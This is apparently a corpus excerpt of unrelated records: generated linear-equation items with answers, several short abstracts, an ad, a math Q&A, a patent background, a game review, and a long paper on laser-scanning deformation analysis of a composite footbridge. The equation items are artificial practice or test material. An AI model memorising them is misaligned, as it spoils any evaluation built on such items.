146 = -21 for h. 2 Solve 54*g + 553 = 11*g - 393 for g. -22 Solve 493*x - 572*x + 1817 = 0 for x. 23 Solve 920 = 76*b + 84 for b. 11 Solve -49*j = 207*j - 40*j - 1080 for j. 5 Solve -98 = -162*r - 2204 for r. -13 Solve 29*g + 2528 - 2731 = 0 for g. 7 Solve -5*k + 0*k - 50 = 5*k for k. -5 Solve -196*v = -4059 - 57 for v. 21 Solve -h + 1482 - 1458 = 0 for h. 24 Solve -5*k - 19*k - 4*k - 280 = 0 for k. -10 Solve -1362*j = -55*j + 7842 for j. -6 Solve 25*i = -39 - 61 for i. -4 Solve -91 = c - 43 - 49 for c. 1 Solve -246 = -54*g + 176 + 334 for g. 14 Solve -4930 = 51*b - 587*b + 43*b for b. 10 Solve 150 = -211*t + 136*t for t. -2 Solve -63*f + 799 = -208*f + 98*f for f. -17 Solve 60 = -7*h - 7*h - 24 for h. -6 Solve 27*z - 28*z = -59*z + 580 for z. 10 Solve 2238 = -321*r - 4182 for r. -20 Solve 2320*g - 2204*g + 580 = 0 for g. -5 Solve -29*q - 23*q + 389 = 77 for q. 6 Solve 37*w = 346*w - 7416 for w. 24 Solve -39*p - 1 + 5 = -38*p for p. 4 Solve 0 = -113*h - 36*h - 2086 for h. -14 Solve -85 - 19 = -38*n + 124 for n. 6 Solve 54998*z + 88 = 54987*z for z. -8 Solve -163*b - 2806 = -41*b for b. -23 Solve 3*k - 3299 + 1632 = -1607 for k. 20 Solve -71*u - 692 - 289 = 38*u for u. -9 Solve -1113*f + 609 = 1127*f - 2211*f for f. 21 Solve 0 = 67*d + 4*d + 7*d + 2028 for d. -26 Solve 25*x - 535 + 660 = 0 for x. -5 Solve 31*y = -160832 + 160646 for y. -6 Solve -258*l + 265*l + 21 = 0 for l. -3 Solve -2025*g + 960 = -2145*g for g. -8 Solve 990 = 3*y + 1011 for y. -7 Solve 0 = 165*m + 465 - 2115 for m. 10 Solve -3014*j + 8164 = -3642*j for j. -13 Solve 6*s + 175 = 31*s for s
null
minipile
NaturalLanguage
mit
null
[Transurethral resection and cancer of the prostate, an up-to-date view]. Current urological literature, which is mainly concerned with radical prostate surgery and new modalities of hormone therapy, seems to focus little interest on the indications and techniques of transurethral resection in patients with prostatic cancer. However, transurethral surgery still remains a procedure frequently resorted to in those patients in whom the indications and techniques warrant a critical evaluation. The reasons for performing endoscopic surgery (64%) and the complications observed in 50 consecutive cases that had been treated by the author are analyzed herein and the literature reviewed.
null
minipile
NaturalLanguage
mit
null
About this Deal Grab some gourmet grub to go. Bacon Peanut Brittles are a blend of peanuts, maple syrup, bacon, and spices, tossed and roasted into addictively crunchy bites. They satisfy modern gourmet palates and pay homage to memories of a home-cooked classic
null
minipile
NaturalLanguage
mit
null
Q: Initial-Value Problem Taylor's Method of order 2 Given the initial-value problem $$y' = te^{3t} - 2y,\qquad 0 \leq t \leq 1, \qquad y(0) = 0$$ with $h = 0.5$. Use the Taylor's method of order two to approximate the solutions to the given IVP. (Solution: $w_1 = 0.12500000$, $w_2 = 2.02323897$.) I've tried this problem quite a few times but keep getting incorrect answers. My guess is that I'm calculating the derivative incorrectly which is giving me an incorrect result for $w_2$. My approach so far is as follows: Observe that $f(t, y) = te^{3t} - 2y$. I calculate that $f'(t, y) = e^{3t} + 3t^2e^{3t} - 2y'$ which is the same as $f'(t, y) = e^{3t} + 3t^2e^{3t} - 2(te^{3t} - 2y) = e^{3t}(3t^2 -2t + 1) + 4y$. Also, $t_0 = 0$, $t_1 = 0.5$, and $t_2 = 1$. $w_0 = 0$, $w_1 = w_0 + h(f(t_0, w_0) + \frac{h}{2} f'(t_0, w_0))$ and $w_2 = w_1 + h(f(t_1, w_1) + \frac{h}{2} f'(t_1, w_1))$. Now, plugging in numbers yields: $w_0 = 0$, $w_1 = 0.125$ and $w_2 = 1.603081$. Can someone try and catch what I've done wrong? PS The reason I think my derivative is wrong is that I wrote a program in MATLAB to calculate the approximations using this method and tested it with an example in the book I'm using and the results we're consistent with the book's, but then when I ran my code, it didn't match the results I should be getting, according to the professor. A: When you calculate $f'(t,y)$, the derivative of $e^{3t}$ is $3e^{3t}$, not $3te^{3t}$
null
minipile
NaturalLanguage
mit
null
JP2006-166498A describes a known manufacturing method of a laminated rotor iron core. According to JP2006-166498A, the manufacturing method of the laminated rotor iron core includes a process for pressing a metal plate and forming a belt iron core pieces and a process for spirally wrapping and laminating the belt iron core pieces and mutually caulking and coupling the laminated belt iron core pieces. The belt iron core pieces have a shape of the laminated rotor iron core linearly developed. The belt iron core pieces have a cutout formed at a side edge corresponding to an inner circumference at a predetermined interval. The circular side edge corresponding to the inner circumference between the adjacent cutouts corresponds to an inner circumference of a shaft hole. The belt iron core pieces have a magnet mounting hole or a diecast metal filing hole formed in the middle in the width direction at the predetermined interval. A side edge corresponding to an outer circumference of the belt iron core pieces are locally pressed and expanded when the belt iron core pieces are spirally wrapped. When the belt iron core pieces are spirally wrapped, because the cutout is formed at the predetermined interval, the side edge corresponding to the inner circumference can be bended without exerting plate compressive force on the side edge corresponding to the inner circumference and the belt iron core pieces can be wrapped to a circular shape. However, according to the known manufacturing method of the laminated rotor iron core described in JP2006-166498A, because the belt iron core pieces are locally pressed and expanded when the belt iron core pieces are spirally wrapped and laminated, partial deformation and embossment tend to be formed when an outer circumferential side of the belt iron core pieces is bended and ensuring precision tends to be difficult. Further, for minimizing the deformation of the outer circumferential side of the belt iron core pieces, the belt iron core pieces need a large cutout and a complex shape with consideration to the deformation. However, the large cutout and the complex shape of the belt iron core pieces tend to cause low yield rate of the belt iron core pieces (material of the laminated rotor iron core) and large and expensive punch die set for forming the belt iron core pieces. Further, other than the punch die set, a loading device for loading the belt iron core pieces and a wrapping unit for wrapping and laminating the belt iron core pieces are separately needed for spirally wrapping and laminating the belt iron core pieces. A need thus exists for a method for manufacturing a laminated rotor core which is not susceptible to the drawback mentioned above.
null
minipile
NaturalLanguage
mit
null
Item added to your basket! 39 A disappointment in the least When I first saw this game I thought "Great, another shoot shmup game, I love those". And I do. Games like Sine Mora and Beat Hazard are games I've put a reasonable amount of time into. This one does not meet my expectations. The art style is definitely cool. I like that a lot. Sadly, that's the only thing to it. Repetitive, boring gameplay and not able to sustain entertainment all the way through. Since it's a steep learning curve in the game you will have to refine those reflex skill to progress and to be honest, I think you can do that somewhere else and be more entertained in the process. Try for example Jamestown instead.
null
minipile
NaturalLanguage
mit
null
Intramolecular Diels-Alder Reaction of a Silyl-Substituted Vinylimidazole en Route to the Fully Substituted Cyclopentane Core of Oroidin Dimers. An intramolecular Diels-Alder reaction of a silyl-substituted vinylimidazole delivers a diastereomeric mixture of C4-silyl functionalized dihydrobenzimidazoles. Subsequent diastereoselective reduction and elaboration of the lactone gives rise to a polysubstituted tetrahydrobenzimidazole, which, upon oxidative rearrangement, affords a single spirofused imidazolone containing all of the relevant functionality for an approach to the oroidin dimers axinellamine, massadine, and palau'amine.
null
minipile
NaturalLanguage
mit
null
1. Introduction {#sec1-sensors-18-04332} =============== In recent years, significant changes in structural diagnostics have been observed, mostly thanks to the development of remote sensing techniques. Moreover, along with the growing influence of computer science, the processing of remote sensing data, such as point cloud data, has become of greater importance. Especially vivid is the progress achieved in laser scanning technology. High-Performance Terrestrial Laser Scanners can gather one million points per second and have a range of more than one kilometer. New challenges demand more sophisticated methods of point cloud processing, designed to evaluate structures and structural deformations. In this paper, we present a general framework for studying the structural deformations of bridges, especially those that deform in an irregular way, such as composite bridges. We describe in detail the advanced shape analysis achieved with the use of a precise optical device, the terrestrial laser scanner (TLS), along with point cloud data processing. The procedure we present combines rough change estimation, virtual visual inspection, and an extensive spheres translation method (STM) analysis, which allows us to obtain a quick change estimation and a detailed picture of the deformation under different types of load. We evaluated a composite pedestrian foot-bridge during proof loading, subjected to various load cases. The load cases of the proof loading were static, so there was no bridge resonance to consider. The study was carried out as a part of broader research project conducted by the Faculty of Civil and Environmental Engineering at the Gdansk University of Technology. The algorithms and procedures described in the following paper are an extension of the methods designed by the authors in previous studies. We compare the state-of-the-art point cloud processing approach with well-known measurement methods, such as a total station measurement, or inductive sensors measurement. A complex form of the span and its unobvious deformation state allow contributions from the advantages of remote sensing techniques. The greatest gain of TLS usage and its competitive advantage over other measurement methods, such as a total station, is the complexity of the obtained data---TLS creates a three-dimensional projection of the scanned object in time. Using a total station, it is possible to measure one particular point at a time, which extends the measurement time and is more time-consuming. The rationale behind performing the analysis on a composite bridge is that composite bridges deform irregularly in three axes, so using TLS in this particular application is valuable. What is more, the presented STM approach has previously only been used in laboratory conditions. The topic of bridge evaluation using TLS appears in the international literature. Riveiro et al. \[[@B1-sensors-18-04332]\] used TLS scans and orthophotographs to evaluate masonry arch bridges. Additionally, Riveiro et al. \[[@B2-sensors-18-04332]\] proposed the use of a hybrid method of TLS, photogrammetry, and total station measurement for the structural inspection of the bridge. Xu et al. \[[@B3-sensors-18-04332]\] and Yang et al. \[[@B4-sensors-18-04332],[@B5-sensors-18-04332]\] present an adoption of TLS technology in the deformation analysis of a composite arch structure under monotonic load. They tested a masonry arch on reinforced concrete supports and used a Z+F laser scanner (Zoller + Fröhlich GmbH, Wangen, Germany). The approximated surface model of supposedly the bottom of the lower vault was the focal point of consideration. They calculated the surface difference by the comparison of two epoch surfaces, but they did not mention the exact point cloud processing method that allows calculation of their results. There are a few works which present a field case study of bridge evaluation; for example, TLS. Kitratporn et al. presented an evaluation of a suspension bridge in Myanmar \[[@B6-sensors-18-04332]\]. To measure the steel tower inclination by extracting the planer surface using RANSAC (see [Appendix A](#app1-sensors-18-04332){ref-type="app"}, [Table A1](#sensors-18-04332-t0A1){ref-type="table"})algorithm \[[@B7-sensors-18-04332]\] they took the average vertical coordinate value of each point on the extracted planer with 1.5 m increments. Zogg et al. used terrestrial laser scanning for deformation monitoring on the Felsenau Viaduct in Switzerland during load tests \[[@B7-sensors-18-04332]\]. They obtained the difference between point clouds by calculating residuals as the shortest distances from the scan points to the reference surface, which was generated by triangulation. 2. Materials and Methods {#sec2-sensors-18-04332} ======================== 2.1. Composite Bridge Description and Experiment Set-Up {#sec2dot1-sensors-18-04332} ------------------------------------------------------- Composites compete with standard materials like concrete, steel, or wood. Composites are primarily much lighter than conventional materials and do not erode, which is crucial for constructions exposed to an aggressive environment. In the considered bridge, the spans have a sandwich-type support structure. The core is foam and coatings built from laminated fiber-reinforced polymer in the form of sandwich panels. The sandwich panel skins and lips are from the flame-retardant vinyl-ester resin as a matrix, and E-glass fabrics as its reinforcement. The polyethylene terephthalate foam core of the sandwich panel has a thickness of 100 mm and a density of 100 kg/m^3^. Due to significant local actions, which cannot be sustained by foam, the core in the support area consists of fiber reinforced polymer. The bridge in the longitudinal and transverse directions has chopped strand ribs inside the core. The total mass of the footbridge superstructure is 3200 kg. The bridge has a low-elevation pseudo-arch, simply supported by the span of a U-shape channel section with auxiliary lips. The bridge was designed to meet specific parameters, such as the weight, bearing capacity, and conditions needed to achieve specific bearing capacity, comfort of use, attractive architectural design, durability, non-flammability, weather resistance, UV radiation resistance, chemical and electrical insulation, ease of assembly and disassembly, and easy repair and maintenance. The composite bridge span is one of the unique constructions made entirely as one piece. This method involves vacuum resin impregnation and thanks to the infusion process, color, texture, and the decorative element can be included, which does not exclude casual surface painting. The bridge was devised and assembled within the "FOBRIDGE" project (Gdansk University of Technology: Project Leader, Warsaw Military University of Technology. Roma Private Limited Company: footbridge manufacturer). More information about the project can be found in the references \[[@B8-sensors-18-04332],[@B9-sensors-18-04332]\]. The image of the bridge, along with the schematic cross-section and side view, are shown in [Figure 1](#sensors-18-04332-f001){ref-type="fig"} and [Figure 2](#sensors-18-04332-f002){ref-type="fig"}a,b, respectively. The experimental set-up was in the middle of the span, two meters from the center of the bridge diaphragm. The scheme of the measurement station is shown in [Figure 3](#sensors-18-04332-f003){ref-type="fig"}. The position of the scanner is fixed, as shown in [Figure 4](#sensors-18-04332-f004){ref-type="fig"}. 2.2. Measurements and Point Cloud Processing {#sec2dot2-sensors-18-04332} -------------------------------------------- This chapter describes measurements, point cloud processing, mesh modeling methods, and change detection methods essential for qualitative deformation assessment. We performed scans at point zero, before proof loading and during the proof loading of the composite bridge. The proof loading consists of loading the deck with given load combinations and observing the deformation of the object. We make a scan with every change of the load combination. Due to difficult measuring conditions, especially the large research group that were simultaneously conducting other tests, partially covering the object while the device was sending a laser beam, we performed the TLS measurement multiple times for some load increments. We used a ScanStation C10 scanner, manufactured by Leica Geosystems AG (Heerbrugg, Switzerland). ### 2.2.1. Pre-Processing of the Point Cloud {#sec2dot2dot1-sensors-18-04332} We must process obtained point cloud samples in a certain way before the analysis. Most of the studies which focus on the processing of the point cloud mention three general steps: data sampling, noise reduction, and shadow filling. Data sampling helps to reduce the input redundancy, and its roots can be traced to clustering by Schreiber \[[@B10-sensors-18-04332]\] and Thinning algorithms by Floater et al. \[[@B11-sensors-18-04332]\]. Hou et al. \[[@B12-sensors-18-04332]\] presented an entirely new approach where sampling is carried out by a virtual adaptive process. One of the excellent works on automation of noise reduction is by Fua et al. \[[@B13-sensors-18-04332]\], in which the authors use it for the unstructured point cloud. There are many approaches to noise reduction, such as in Rusu et al.'s work \[[@B14-sensors-18-04332]\], where the authors proposed using a sophisticated algorithm which consists of filtering the point cloud, removing outliers, and returning the linear indices to the points that are either inliers or outliers. This method eliminates noise and resamples the data without deleting the essential details. The shadow filling can be handled by performing additional scans, but there is a method that uses volumetric diffusion, developed by Davis et al. \[[@B15-sensors-18-04332]\]. Raw point cloud data obtained directly after the measurements has to be processed with cleaning tools, and this so-called cleaning involves deleting redundant areas in the point cloud. Excessive regions of the point cloud contain data which do not directly refer to the considered scanned object, such as people, terrain, and trees, as in [Figure 5](#sensors-18-04332-f005){ref-type="fig"}a. We used the manual fencing procedure. The first step is to select an excessive part of the point cloud using a rectangular field, and then to remove everything in this field. The method is usually repeated a few times, as in [Figure 5](#sensors-18-04332-f005){ref-type="fig"}b. The result of the cleaning process is a point cloud representing only the considered object, as in [Figure 5](#sensors-18-04332-f005){ref-type="fig"}c. Due to various additional measurements that were carried out during proof loading, the lateral surface of the bridge was often obscured by the people crossing the view line between the bridge span and the scanner device. Obstacles between the bridge and a scanner caused the formation of rifts in the point cloud, so-called shadows, as shown in [Figure 6](#sensors-18-04332-f006){ref-type="fig"}a. These may result in an unstable distribution of points in the point cloud. We predicted the occurrence of such a situation, which is why we made several scans for each load case change. Points acquired in additional scans were used to fill the rift, as shown in [Figure 6](#sensors-18-04332-f006){ref-type="fig"}b. We merged the additional scans by allocating them in the same model space, as a given load case original scan. It is worth emphasizing once again that the position of the scanner was fixed during additional scans, as well as during the entire proof loading process. Effects of the unevenly distributed point cloud may be visible in the form of local congestion and rarefaction of points in the cloud. Point cloud optimization may help to improve redistribution of points in the cloud, but due to the precise nature of the analysis, the authors decided not to interfere with the structure of the points in order to reflect, as closely as possible, the actual state of the deformation in time. ### 2.2.2. Post-Processing of the Point Cloud {#sec2dot2dot2-sensors-18-04332} Mesh Generation There are many methods for mesh modeling of point clouds, and this issue is constantly being developed. The first algorithms which referred to mesh modeling of the point cloud were created by Boissonnat et al. in the mid-1980s \[[@B16-sensors-18-04332],[@B17-sensors-18-04332]\], but were practically not developed further by the scientific community until the beginning of the 1990s, when Hoppe et al. published extensive work about surface reconstruction of the unprocessed point cloud \[[@B18-sensors-18-04332]\]. Intensive work on this issue at the end of the nineties and later resulted in the emergence of a large number of new algorithms, but also a division into two main trends. The first trend focused on the methods where the zero-set of a scalar 3D function estimated the mesh surface \[[@B19-sensors-18-04332],[@B20-sensors-18-04332],[@B21-sensors-18-04332],[@B22-sensors-18-04332]\], and another group used the Delaunay complex to rough mesh surface by its subcomplex \[[@B23-sensors-18-04332],[@B24-sensors-18-04332],[@B25-sensors-18-04332],[@B26-sensors-18-04332],[@B27-sensors-18-04332],[@B28-sensors-18-04332],[@B29-sensors-18-04332],[@B30-sensors-18-04332],[@B31-sensors-18-04332]\]. Modern meshing algorithms mostly perform construction of the Delaunay complex in an incremental manner, and to improve data locality optimize the insertion order by spatial sorting techniques \[[@B32-sensors-18-04332],[@B33-sensors-18-04332],[@B34-sensors-18-04332]\]. A good example of the further development of these algorithms is the use of three point-insertion sequences for incremental Delaunay tessellations performed by Gonzaga et al. \[[@B34-sensors-18-04332]\]. After the pre-processing stage, each point cloud was exported in PTX format with its intensity map for further processing in "MeshLAB" and "CloudCompare". The software uses an algorithm which connects every spatial point with its nearest surrounding points and builds a triangle grid to create a mesh model for every state in time, as shown in [Figure 7](#sensors-18-04332-f007){ref-type="fig"}a. Several mesh models were prepared, including models covered with intensity maps, as in [Figure 7](#sensors-18-04332-f007){ref-type="fig"}b,c. How to Detect Deformations in the Point Cloud It is necessary to compare the reference scan and the scan from a given load case to determine the deformation state of the bridge. There are two groups of point cloud processing methods for change analysis: region-based and point-based. One of the first approaches to TLS data change detection was proposed by Girardeau-Montaut et al. \[[@B35-sensors-18-04332]\] and focused on the direct comparison of point clouds by an average distance, best fitting plane orientation, and the maximum length among the points in one set to the closest point in another set---so-called the Pompeiu--Hausdorff distance. Girardeau-Montaut et al. showed that among these three parameters, the third one gives the best validation. Lindenbergh and Pfeifer \[[@B36-sensors-18-04332]\] presented a solution to detect deformation using an analysis based on the point-to-plane approach, in which points and fitted planes are compared between consecutive epochs. Comparison with the use of range segmentation was presented by Zeibak and Filin \[[@B37-sensors-18-04332]\], who tried to overcome two main issues of TLS data: occlusion and spatial sampling. The method based on point-to-point measurement of the Pompeiu--Hausdorff distance was proposed by Kang et al. \[[@B38-sensors-18-04332]\], and the authors pointed out that point-to-point is sensitive to local point density, tending to make the point-to-plane approach more reliable. Zhang et al. \[[@B39-sensors-18-04332]\] detected a spatial change using an anisotropic-weighted ICP (A-ICP) (see [Appendix A](#app1-sensors-18-04332){ref-type="app"}, [Table A1](#sensors-18-04332-t0A1){ref-type="table"}) algorithm, and also presented how to model the random error. The authors were able to estimate the synthetic surface ruptures. Ziolkowski et al. \[[@B40-sensors-18-04332],[@B41-sensors-18-04332]\] proposed to study the change of the scanned object in time by tracking the position of physical characteristic objects projections. The authors used this method to study the deformations of the concrete element under monotonous loading. 3. Results: Analysis of Shape Deformation {#sec3-sensors-18-04332} ========================================= 3.1. Deformation of Bridge Diaphragm during Proof Loading {#sec3dot1-sensors-18-04332} --------------------------------------------------------- Deformation of bridge diaphragm is particularly crucial for the overall bearing capacity of the bridge. The lateral surface of the bridge diaphragm deformed irregularly, making it difficult to obtain a complete image of deformation with standard measurement methods. The general modal states are the best illustration of various deformation states \[[@B9-sensors-18-04332]\], shown in [Figure 8](#sensors-18-04332-f008){ref-type="fig"}. We propose a general framework for deformation analysis: the block diagram presented in [Figure 9](#sensors-18-04332-f009){ref-type="fig"}. The solution consists of three stages: change detection, determination of general deformation trend, and precise determination of deformations in specified areas. 3.2. Change Detection {#sec3dot2-sensors-18-04332} --------------------- ### 3.2.1. Rotation of the Bridge Diaphragm {#sec3dot2dot1-sensors-18-04332} To determine if a deformation exists, we check whether a change has occurred between the scan before and after applying the load. In the case of the considered composite foot-bridge, deformation of the lateral surface of the diaphragm is particularly essential. The diaphragm rotation between two states in time is a simple valve, which can be used to estimate if the change occurred. However, such a considerable simplification loses details of local deformations, so the tool should be used with caution. The method consists of the creation of two mesh models generated by special kinds of algorithms, called FM (Fast Marching) and KD-Tree. Mesh models, as previously noted, are projections of the bridge diaphragm for two states in time. In the considered case, we used the FM algorithm because it needs fewer parameters and is easier to implement. However, KD-Tree is an excellent alternative to FM. ### 3.2.2. FM (Fast Marching) and KD-Tree Algorithms in the Building of the Mesh Model {#sec3dot2dot2-sensors-18-04332} The FM algorithm divides the initial point cloud into smaller patches and regroups them with systematic subdivision, which is not recursive. Afterward, most of the pieces will be the same size, but have different surface curvature due to the set resolution. Next is the fusion process, which is based on FM front propagation. The algorithm assumes that two input parameters, such as the grid resolution, expressed as the subdivision level of the cloud octree and accuracy level, is achieved by re-computation of the facet retro-projection error. We can use an octree for a faster initialization. Another algorithm which is also satisfactory for mesh generation is the KD-Tree algorithm. The algorithm recursively divides the point cloud into small patches in a planar shape, which regroups to larger facets. The method needs several input values, which are as follows: maximum angle between proximity patches, maximum relative distance, maximum angle, current facet center, and the maximum distance between patches, which should be merged. The critical differences between the KD-Tree and FM algorithm are as follows: The subdivision is systematic in FM and not recursive as in KD-Tree. The FM fusion process is based on front propagation. KD-Tree represents a disjointed partition. We decided to use FM because it needs fewer parameters and is easier to implement. ### 3.2.3. Actual Rotation of the Bridge Diaphragm {#sec3dot2dot3-sensors-18-04332} We calculate the actual rotation of bridge diaphragm with use of two mesh projections of the bridge in time, before and after the applied load. Meshes for both states in time were generated by the FM algorithm, with the parameters needed to create estimated facet (shown in [Figure 10](#sensors-18-04332-f010){ref-type="fig"}a,b). We presented the rotation by the surface centers and normal vectors, as shown in [Table 1](#sensors-18-04332-t001){ref-type="table"}. This rough simplification allows estimation of whether the change in the element position occurred. The conclusions were that due to the rotation, the upper part of the lateral surface moved in the perpendicular direction, continuously otherwise a bottom portion of the plate. The rotation is clearly visible in [Figure 10](#sensors-18-04332-f010){ref-type="fig"}b. 3.3. Determination of the General Deformation Trend {#sec3dot3-sensors-18-04332} --------------------------------------------------- When we found out that the change occurred, we were able to assess the general deformation trends. This should tell us which part of the bridge is the most deformed and on which area we should focus for precise calculation. In this subsection, the authors show what the visual assessment of bridge diaphragm mesh models looks like at two points in time. Selected projections of the bridge at two points in time were placed in one coordinate system and superimposed on each other. The procedure requires a fixed coordination system. By visually analyzing the first image of [Table 2](#sensors-18-04332-t002){ref-type="table"}-1, it can be seen that these two scans do not cover in a consistent, systematic manner. The support and bottom area of the composite bridge span have a uniformly penetrating grid structure, as seen in [Table 2](#sensors-18-04332-t002){ref-type="table"}-2. In [Table 2](#sensors-18-04332-t002){ref-type="table"}-3 patches of different colors permeate with each other, which indicates that no deformation has occurred. However, the middle and upper part of the span do not have the same appearance. The two meshes do not overlap, and the color of only one grid is visible, as shown in [Table 2](#sensors-18-04332-t002){ref-type="table"}-4. In [Table 2](#sensors-18-04332-t002){ref-type="table"}-5, the authors managed to capture the curve that the object leans towards from the plane of the bridge diaphragm's lateral surface with increased deformation, as well as the rotation of the diaphragm lip in [Table 2](#sensors-18-04332-t002){ref-type="table"}-7. More detailed observations of the bridge diaphragm deformation are in [Table 2](#sensors-18-04332-t002){ref-type="table"}. This part of the analysis should yield an answer to the deformation trends and on what areas we should focus during the exact calculation of the deformation volume in the next part of the study. 3.4. Spheres Translation Method (STM) {#sec3dot4-sensors-18-04332} ------------------------------------- ### 3.4.1. Application of the Spheres Translation Method {#sec3dot4dot1-sensors-18-04332} To accurately measure the deformations of the lateral surface of the bridge diaphragm, we adapted and used the spheres translation method. The spheres translation method (STM) is one of the point cloud processing procedures, alongside such methods as the point-to-point, point-to-surface, or surface-to-surface methods. The spheres translation method (STM) procedure consists of several steps. The first step is the placement of special tags (e.g., round plates) on the object. Then, during the measurements, we scan the tags along with the entire structure. In post-processing we fit the spheres into the points that represent these tags in the point cloud. Then, we track changes in their position over time. Positional deviations of the spheres indicate the direction of deformation. In other words, it comes down to the selection of characteristic points, which represent the tags on the surface of the object, partially shown in [Figure 11](#sensors-18-04332-f011){ref-type="fig"}d. Transformation of these points to the virtual mesh sphere are tracked in time. This method has several boundary conditions, the most important of which is a fixed coordination system, common to subsequent measurements. The uniform coordinate system was obtained by performing all measurements from a fixed scanner position. We made a "zero" scan before applying the load, which was the reference scan. We identified differences in the position of the spheres as the displacement vector in a given direction. The displacement of the sphere is visible in [Figure 11](#sensors-18-04332-f011){ref-type="fig"}a--c. We present an example of the location change of the sphere SD_2 over time to illustrate the procedure. We distinguished the spheres marked as SD2_S1 and SD2_S2 by the colors green and red, respectively. The coordinates of both objects are in [Table 3](#sensors-18-04332-t003){ref-type="table"}. We determined coordinates in respect to the reference scan. The displacement is about 1 mm. We performed the proof loading (U1) in several steps, presented in [Table 4](#sensors-18-04332-t004){ref-type="table"}. The overall weight of the slabs in the U1 test was equal to 14,400 kg. Analysis using the spheres translation method (STM) was performed for various loads conducted in the following order: 1 + 2; 1 + 2 + 3; 1 + 2 + 3 + 4; 2 + 3 + 4; 3 + 4; 4. The bridge span was loaded and unloaded alternately. ### 3.4.2. Comparative Analysis {#sec3dot4dot2-sensors-18-04332} We prepared a comparative study of TLS results with those of the deflectometer and total station. Deflectometer inductive sensors were set at three points below the surface of the bridge span, distant from each other by 3.50 m, and were used to determine vertical displacements. We measured horizontal and vertical movements with the Leica Nova MS50 surveying station. We carried out the spheres translation method (STM) deformation measurements based on TLS data. To statistically describe the deformations of the composite bridge diaphragm lateral surface and enable comparative analysis with other methods, the authors decided to isolate three cross-sections for each analyzed load case, as shown in [Figure 12](#sensors-18-04332-f012){ref-type="fig"}. The profile position was based on the approximate position of spheres located in the closest vicinity of the cross-section. We calculated the displacements of the spheres by applying results from individual load cases to a reference sphere's position from the case before the load was applied. We present the deformations of the composite bridge diaphragm lateral surface in the perpendicular direction for different load cases in [Figure 13](#sensors-18-04332-f013){ref-type="fig"}a--f (STM in three sections compared with total station measurements), and the vertical displacements in [Figure 14](#sensors-18-04332-f014){ref-type="fig"}a--f (STM in three sections, total station measurements, and deflectometer). We show the data for individual areas of the composite bridge diaphragm lateral surface, which is divided along the length of the bridge into equal sections with lengths of 1.75 m. We decided to adopt the length of 1.75 m because this value corresponds to the placement of markers used for total station measurements. ### 3.4.3. Observations from the Comparative Analysis {#sec3dot4dot3-sensors-18-04332} By analyzing the research material presented in [Figure 13](#sensors-18-04332-f013){ref-type="fig"} and [Figure 14](#sensors-18-04332-f014){ref-type="fig"}, it can be concluded that there is a high convergence of results between the results of displacements obtained by TLS and the measurements from the total station and the deflectometer. A great advantage of TLS over the other measurement methods is a more comprehensive form of results. The use of TLS and STM allows control of the deformations on the whole lateral surface of the bridge diaphragm. 4. Summary and Conclusions {#sec4-sensors-18-04332} ========================== This paper presents a general framework for the deformation study of bridges, with a clear indication of the bridges that are subject to very irregular deformation, such as composite bridges. We propose a solution which combines rough change estimation, virtual visual inspection, and STM analysis, giving the advantages of both quickly change estimation and precise deformation measurement. We describe the test set-up configuration, the procedure of pre-processing and post-processing of the point cloud data, and the extensive literature review for point cloud processing, mesh modeling, and change detection. We gathered point cloud data during the proof loading process from a fixed scanner position by a Leica ScanStation C10 terrestrial laser scanner. We performed the first scan before and after the load of the bridge for the various load cases during proof loading. Our algorithm has three steps: The first step is to check if there has been a change in the considered object between the two points in time. We did a quick, rough assessment of whether the change occurred in the object by comparing two facets generated with the FM algorithm. Rotation of facets for different points in time indicates the occurrence of a deformation. Once we know that a deformation exists, we can perform a virtual visual inspection of the bridge by superimposing two mesh models in one model space to see the nature of the distortion. Checking the kind of deformation gives knowledge in which areas it is worth focusing on during accurate measurements, such as STM analysis, as these are time-consuming. We presented how to efficiently perform a virtual visual inspection of the bridge for two points in time. The third step is taking accurate measurements using point cloud processing. We adapted the STM to perform a detailed analysis of the deformations and adjusted the method for field use. We modified the STM by analyzing the object in three sections, which helped to cover most of the bridge diaphragm surface. The method was designed for concrete element deformation under monotonous load in our previous studies \[[@B40-sensors-18-04332]\]. We compared the results from the STM with the results obtained using a total station and the deflectometer, and found they were similar. The advantages of the method proposed by us are a much broader insight into the deformation state of the object for different load cases in comparison with the total station and the deflectometer, which is especially significant in the examination of composite bridge diaphragms as they deform irregularly in a direction perpendicular to the diaphragm lateral surface. Additionally, TLS measurements are much faster than those taken with Total Station and the deflectometer. The downsides of this solution are the sensitivity to changes in the position of the scanner, weather conditions, point cloud density fluctuations, rifts in the point cloud, and improper scanning, and the need for troublesome data processing. The issue of complex shape analysis for the composite structures presented in this paper is significant, and we would like to develop it further. Further work will include the designation of procedures for large-scale bridges, as well as the improvement of existing methods. The authors would like to express gratitude to the Department of Mechanics of Materials and Structures for providing data and allows participating in the proof loading process, as well as the Department of Geodesy for sharing Terrestrial Laser Scanner device. Both departments are a part of Faculty of Civil and Environmental Engineering, at the Gdansk University of Technology. Conceptualization, P.Z.; Methodology, P.Z.; Software, P.Z.; Validation, P.Z. and J.S.; Formal Analysis, P.Z. and J.S.; Investigation, P.Z. and J.S.; Resources, J.S. and M.M.; Data Curation, P.Z. and J.S.; Writing-Original Draft Preparation, P.Z.; Writing-Review & Editing, P.Z.; Visualization, P.Z.; Supervision, P.Z.; Project Administration, P.Z.; Funding Acquisition, M.M. Bridge tests refers to the project supported by the National Centre for Research and Development, Poland, grant no. PBS1/B2/6/2013 and statutory research of the Department of Concrete Structures and the Department of Geodesy FCEE GUT--financed by the Ministry of Science and Higher Education of Poland. The authors declare no conflict of interest. We listed acronyms used in the paper in [Table A1](#sensors-18-04332-t0A1){ref-type="table"}. sensors-18-04332-t0A1_Table A1 ###### List of acronyms used in the paper. No. Acronym Description ----- --------- -------------------------------- 1 FM Fast Marching algorithm 2 ICP Iterative Closest Point 3 KD-Tree KD-Tree algorithm 4 RANSAC RANdom SAmple Consensu 5 STM Spheres Translation Method 6 TIN Triangulated Irregular Network 7 TLS Terrestrial Laser Scanning ![Composite bridge.](sensors-18-04332-g001){#sensors-18-04332-f001} ![Composite bridge cross-section (**a**) and side view (**b**) with dimensions.](sensors-18-04332-g002){#sensors-18-04332-f002} ![Experimental set-up scheme.](sensors-18-04332-g003){#sensors-18-04332-f003} ![Fixed scanner position: the arrow points out the location of the scanner.](sensors-18-04332-g004){#sensors-18-04332-f004} ![The images show a view of the point cloud in the following phases: (**a**) before pre-processing; (**b**) fenced area for deletion; and (**c**) after pre-processing.](sensors-18-04332-g005){#sensors-18-04332-f005} ![Images refer to point cloud structural processing: (**a**) so-called shadow as a breach in the point cloud; and (**b**) filling the "shadow" with points acquired in additional 